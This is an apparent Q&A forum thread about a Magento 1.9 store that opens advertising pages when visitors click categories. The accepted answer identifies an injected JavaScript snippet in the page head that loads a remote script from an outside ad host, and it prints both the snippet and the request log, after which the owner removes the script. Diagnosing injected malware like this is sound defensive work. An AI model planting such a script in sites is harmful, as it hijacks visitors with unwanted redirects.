# Magento - Again Advertising page in my site

Tags: magento-1.9

i reopen this question because the problem of advertising page is still present in my site. Any time that change category from navigation menu of my site opens a page of advertising. I try to install someone component for my browser but without results. I try to search a virus on my site but always without any type of virus. And finally I tried to do a scan on my PC but found nothing.

This is the page... http://demo.promowebkit.com/sitoweb/index.php/catalog/category/view/s/estate/id/4/

Where you could be the problem?

Comment: Opening the page doesn'T do anything for me. Can you please add a screenshot?

Comment: Same for me, I can't reproduce the issue, it sounds like it's a problem with your computer. Check your antivirus and scan your computer for potential viruses or infections.

Comment: Try to navigate my site with the different category of navigation menu. Have you the same result without advertising page?

Answer (score 1, accepted):

you have a javascript injected in your pages `<head>`:

> (function(w) { var s =
>   document.createElement('script'); var z = setInterval(function() { if
>   (document.readyState == 'interactive' || document.readyState ==
>   'complete') { clearInterval(z); s.src =
>   "http://64768.w4statistics.info/click.php?p=100526&adult=1&c"; s.async
>   = true; s.type = type = 'text/javascript'; w.document.body.appendChild(s); } }, 200); })(window);

.request details:
http://www.webpagetest.org/result/160606_JD_4247a3868703ae9a32835105755c10a4/1/details/#request67

```
- Request 67: http://64768.w4statistics.info/click.php?p=100526&adult=1&c
URL: http://64768.w4statistics.info/click.php?p=100526&adult=1&c
Host: 64768.w4statistics.info
IP: 188.64.170.5
Error/Status Code: 200
Priority: Low
Initiated By: http://demo.promowebkit.com/sitoweb/ line 80 column 382
Client Port: 52066
Request Start: 4.939 s
DNS Lookup: 139 ms
Initial Connection: 92 ms
Time to First Byte: 128 ms
Content Download: 1 ms
Bytes In (downloaded): 2.3 KB
Bytes Out (uploaded): 0.4 KB
Request Headers:

GET /click.php?p=100526&adult=1&c HTTP/1.1
Host: 64768.w4statistics.info
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 PTST/281
Referer: http://demo.promowebkit.com/sitoweb/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Response Headers:

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 06 Jun 2016 08:37:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.44-0+deb7u1
Content-Encoding: gzip
```

it also set this cookie: `nlc100526`
check your extensions and design tab in magento admin.

Comment: Great man! Thank you very much for the help. Now i search for this code and I will keep you updated.

Comment: Thanks man!!! I have delete this script and now the virus no longer exists. Great!!! ;)